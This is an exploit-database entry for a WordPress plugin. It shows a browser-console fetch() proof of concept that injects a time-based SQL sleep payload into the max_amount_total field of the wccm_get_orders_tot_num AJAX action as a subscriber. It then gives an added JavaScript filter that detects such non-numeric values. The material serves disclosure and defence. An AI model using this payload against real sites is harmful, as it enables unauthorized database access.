## https://sploitus.com/exploit?id=WPEX-ID:1550E30C-BF80-48E0-BC51-67D29EBE7272
While logged in to the blog as a subscriber user, run the command below in the web browser's developer console and note that the response is delayed by 20 seconds:
```javascript
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wccm_get_orders_tot_num&start_date=2024-01-09&end_date=2024-01-11&min_amount=0&max_amount=0&min_amount_total=0&product_relationship=or&product_category_relationship=or&product_category_filters_relationship=and&statuses=wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft&max_amount_total=(select*from(select(sleep(20)))a)',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```
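A defensive check for the request above, as an added example that is not part of the original page or of the plugin's code: it parses a form-encoded `admin-ajax.php` body and flags the `wccm_get_orders_tot_num` action when an amount or date parameter is not a plain value. The expected value formats and the names `inspectAjaxBody` and `summarize` are assumptions made for this example.

```javascript
// Added example: inspect admin-ajax request bodies (e.g. in a WAF rule or log pipeline).
// ASSUMPTION: amount fields are plain decimals and dates are YYYY-MM-DD, as the
// benign values in the request on this page suggest; empty values mean "not set".
const WATCHED_ACTION = "wccm_get_orders_tot_num";
const NUMERIC_FIELDS = ["min_amount", "max_amount", "min_amount_total", "max_amount_total"];
const DATE_FIELDS = ["start_date", "end_date"];
const NUMERIC_RE = /^\d+(\.\d+)?$/;
const DATE_RE = /^\d{4}-\d{2}-\d{2}$/;

function inspectAjaxBody(body) {
  // URLSearchParams applies the same percent-decoding the server would.
  const params = new URLSearchParams(body);
  if (params.get("action") !== WATCHED_ACTION) {
    return { relevant: false, findings: [] };
  }
  const findings = [];
  const check = (fields, re, expected) => {
    for (const field of fields) {
      // getAll() also covers duplicated parameters, which the server may
      // resolve differently from a filter that only reads the first one.
      for (const value of params.getAll(field)) {
        if (value !== "" && !re.test(value)) findings.push({ field, expected, value });
      }
    }
  };
  check(NUMERIC_FIELDS, NUMERIC_RE, "decimal");
  check(DATE_FIELDS, DATE_RE, "date");
  return { relevant: true, findings };
}

// Constructed sample bodies (not captured traffic); the second reuses the
// max_amount_total value from the request shown on this page.
const SAMPLES = [
  "action=wccm_get_orders_tot_num&start_date=2024-01-09&end_date=2024-01-11&min_amount=0&max_amount_total=150.50",
  "action=wccm_get_orders_tot_num&start_date=2024-01-09&max_amount_total=" +
    encodeURIComponent("(select*from(select(sleep(20)))a)"),
  "action=heartbeat&max_amount_total=abc",
];

function summarize(samples) {
  return samples.map((body) => {
    const result = inspectAjaxBody(body);
    if (!result.relevant) return "ignored";
    return result.findings.length ? "flag" : "ok";
  });
}

console.log(summarize(SAMPLES));
```

A filter like this only narrows exposure at the edge; the server-side handler still has to validate or parameterize these values itself.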